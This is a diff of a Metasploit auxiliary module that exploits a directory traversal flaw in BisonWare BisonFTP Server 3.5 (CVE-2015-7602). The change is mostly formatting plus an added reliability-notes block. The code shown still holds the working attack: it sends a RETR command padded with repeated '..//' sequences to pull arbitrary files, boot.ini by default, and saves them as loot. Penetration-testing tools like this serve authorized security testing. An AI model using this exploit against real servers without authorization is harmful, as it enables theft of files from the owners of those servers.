@@ -9,35 +9,41 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Scanner
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',
-      'Description'    => %q{
-        This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server
-        version 3.5. This vulnerability allows an attacker to download arbitrary files from the server
-        by crafting a RETR command including file system traversal strings such as '..//.'
-      },
-      'Platform'       => 'win',
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',
+        'Description' => %q{
+          This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server
+          version 3.5. This vulnerability allows an attacker to download arbitrary files from the server
+          by crafting a RETR command including file system traversal strings such as '..//.'
+        },
+        'Platform' => 'win',
+        'Author' => [
           'Jay Turla', # @shipcod3, msf and initial discovery
           'James Fitts',
           'Brad Wolfe <brad.wolfe[at]gmail.com>'
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'EDB', '38341'],
           [ 'CVE', '2015-7602']
         ],
-      'DisclosureDate' => '2015-09-28'
-    ))
+        'DisclosureDate' => '2015-09-28',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
         OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),
         OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'boot.ini'])
-      ])
-
+      ]
+    )
   end
 
   def check_host(ip)
@@ -61,7 +67,7 @@ class MetasploitModule < Msf::Auxiliary
       # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
       # and  #7582
       if sock.nil?
-        error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; possible invalid response'
+        error_msg = __FILE__ << '::' << __method__.to_s << ':' << 'data_connect failed; possible invalid response'
         print_status(error_msg)
         elog(error_msg)
       else
@@ -69,13 +75,13 @@ class MetasploitModule < Msf::Auxiliary
         file = ::File.basename(file_path)
 
         # make RETR request and store server response message...
-        retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
-        res = send_cmd( ["RETR", retr_cmd])
+        retr_cmd = ("..//" * datastore['DEPTH']) + "#{file_path}"
+        res = send_cmd(["RETR", retr_cmd])
 
         # read the file data from the socket that we opened
         # dont assume theres still a sock to read from. Per #7582
         if sock.nil?
-          error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; possible invalid response'
+          error_msg = __FILE__ << '::' << __method__.to_s << ':' << 'data_connect failed; possible invalid response'
           print_status(error_msg)
           elog(error_msg)
           return
@@ -100,7 +106,6 @@ class MetasploitModule < Msf::Auxiliary
         vprint_line(response_data)
         print_good("Stored #{file_path} to #{loot_file}")
       end
-
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
       vprint_error(e.message)
       elog(e)
